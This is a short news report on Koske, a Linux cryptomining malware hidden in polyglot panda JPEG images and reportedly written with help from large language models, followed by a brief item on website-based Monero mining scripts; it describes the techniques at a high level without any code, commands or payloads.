The emergence of generative artificial intelligence (AI) and large language models (LLMs) has led to increase in the number of malicious bots and cyberattacks. But that was more the case for criminals with superficial programming knowledge. More advanced hackers are now able to use AI to create sophisticated malware.
Recently, a malware called Koske was discovered. The virus hides in generated panda images (found among the files on freeimage, postimage, and OVH images websites), which are used to attack Linux systems. Koske combines image files, rootkits, and adaptive crypto mining logic to create a hidden and persistent backdoor in the system.
The main feature of Koske is the use of polyglot files
A file that can be interpreted in different ways, depending on the context or program that uses it., in particular, JPEG images of pandas that look harmless to the user but contain embedded shell scripts and C code.
Once opened, the file looks like a cute picture, but it also runs malicious commands to deploy crypto miners, best optimized for both CPU and GPU, targeting 18 different coins (Monero, Ravencoin, Nexa, Tari, Zano, and others). The attackers gain access through unauthenticated or misconfigured JupyterLab.
If the connection from the hackers’ Command & Control (C2) infrastructure is blocked, the malware performs diagnostics on its own: it tries to access via curl, wget, TCP; clears iptables, changes DNS, looks for new proxies from GitHub lists, brute-force proxy settings — everything to restore communication with the command server.
When one mining pool shuts down, Koske dynamically switches to another (or another coin). Koske also uses hidden rootkits to mask its files, processes, and even its own presence from security tools. It provides persistence through cron jobs, modifications to .bashrc and .bash_logout, and even creates its own systemd services. Its communication module is capable of detecting proxies, which provides resilience in different network conditions — a characteristic of AI-driven logic.
Researchers have identified modular code structures, well-commented logic, and defensive programming patterns as signs that Koske was written using large language models (LLMs).
Already known threats
Recently, hackers infected more than 3,500 websites with hidden scripts for mining Monero (XMR) tokens. At the same time, the malware does not steal passwords or block files, but turns the browsers of infected website visitors into Monero mining engines.
Spelling error report
The following text will be sent to our editors: